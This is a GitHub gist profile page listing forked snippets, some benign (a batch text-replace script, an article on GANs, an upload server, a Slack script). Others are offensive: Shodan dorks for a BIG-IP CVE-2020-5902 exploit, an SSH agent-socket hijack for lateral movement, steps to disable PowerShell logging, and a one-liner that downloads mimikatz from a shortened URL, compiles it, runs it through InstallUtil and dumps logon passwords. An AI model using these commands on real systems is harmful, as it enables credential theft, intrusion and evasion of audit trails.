Skip to content

Instantly share code, notes, and snippets.

View dskho's full-sized avatar

dskho dskho

View GitHub Profile
@dskho
dskho / tokenReplace.bat
Created May 25, 2022 08:38 — forked from richard087/tokenReplace.bat
Batch file to do a token replacement on a text file, in Windows.
@echo off
rem sourced from http://stackoverflow.com/questions/5273937/how-to-replace-substrings-in-windows-batch-file
setlocal enabledelayedexpansion
set INTEXTFILE=test.txt
set OUTTEXTFILE=test_out.txt
set SEARCHTEXT=bath
set REPLACETEXT=hello
set OUTPUTLINE=
for /f "tokens=1,* delims=¶" %%A in ( '"type %INTEXTFILE%"') do (
@dskho
dskho / content.md
Created April 14, 2021 06:10 — forked from baymaxium/content.md
AI惊艳世界的10个瞬间: 10个生成式对抗系统的最佳应用

原文:硅谷密探

说起“教授”计算机如何完成人类工作,生成式对抗系统(GAN)是现有最有效的手段之一。虽然人们一直被告知“竞争可以激发出更好的表现”,但是只有在有了生成式对抗系统之后这一“从竞争中学习”的逻辑才被发展到了造福产业生产的高度。

具体来说,生成式对抗系统是由不同的AI实体彼此竞争,以达到更好地解决自己任务的目的。想象一下,如果有一个恶意软件程序和一个安保机器人程序同时对抗,彼此都毫不放松的想要在对方的制约下更好的完成自己的职责。那么在这个过程中,他们双方都可以将自己的任务(入侵VS保护)完成的越来越好。

生成式对抗系统最初是由蒙特利尔大学的 Ian Goodfellow 首先创造出来。而最近,它已经向人们显示出了“无监督学习”的强大威力。

@dskho
dskho / clean.php
Created March 18, 2021 01:20
Default passwords
<?php
/**
* Clean script, and generate CSV structure
*
* @version 0.0.1
*/
// Autoupdate Gist functions
@dskho
dskho / CVE-2020-5902.md
Created March 12, 2021 07:24 — forked from cihanmehmet/CVE-2020-5902.md
BIGIP CVE-2020-5902 Exploit POC

🚨BIGIP CVE-2020-5902 Exploit POC 🔥🧱🔨👀


Shodan Seaarch

title:"Big-IP&reg;" org:"Organization Name"
http.title:"BIG-IP&reg;- Redirect" org:"Organization Name"
http.favicon.hash:-335242539 "3992" org:"Organization Name"

🔸LFI

Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.

root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460

root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh user@internal.company.tld

user@internal:~$ hostname -f
internal.company.tld
@dskho
dskho / infosec-tools.txt
Created November 12, 2020 08:39 — forked from diegoalbuquerque/infosec-tools.txt
many infosec tools
Security Tool List
├───AD
│ ├───ACLPwn
│ ├───ACL_PWN
│ ├───ADAPE
│ ├───ADAudit
│ ├───ADCollector
│ ├───ADpwn
│ ├───ADRecon
│ ├───ADReconPowershell
@dskho
dskho / SimpleHTTPServerWithUpload.py
Created November 12, 2020 08:39 — forked from touilleMan/SimpleHTTPServerWithUpload.py
Simple Python Http Server with Upload - Python3 version
#!/usr/bin/env python3
"""Simple HTTP Server With Upload.
This module builds on BaseHTTPServer by implementing the standard GET
and HEAD requests in a fairly straightforward manner.
see: https://gist.github.com/UniIsland/3346170
"""
@dskho
dskho / info.txt
Created October 28, 2020 10:20 — forked from hook-s3c/info.txt
Disable Powershell logging
Logs are held by default in the user profile:
\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
this directory also hosts per-application logs
--------------------------------------------------------------
Disable Logging...
remove-module psreadline
@dskho
dskho / slack.sh
Created September 5, 2020 15:31 — forked from andkirby/slack.sh
Shell/Bash script for sending slack messages.
#!/usr/bin/env bash
####################################################################################
# Slack Bash console script for sending messages.
####################################################################################
# Installation
# $ curl -s https://gist.githubusercontent.com/andkirby/67a774513215d7ba06384186dd441d9e/raw --output /usr/bin/slack
# $ chmod +x /usr/bin/slack
####################################################################################
# USAGE
# Send message to slack channel/user
@dskho
dskho / katz.cmd
Created June 13, 2020 15:54 — forked from xillwillx/katz.cmd
mimikatz.cs one-liner
powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('https://is.gd/Dopn98','katz.cs'); && cd c:\Windows\Microsoft.NET\Framework64\v4.* && csc.exe /unsafe /reference:System.IO.Compression.dll /out:katz.exe katz.cs && InstallUtil.exe /logfile= /LogToConsole=false /U katz.exe && katz.exe log privilege::debug sekurlsa::logonpasswords exit && del katz.*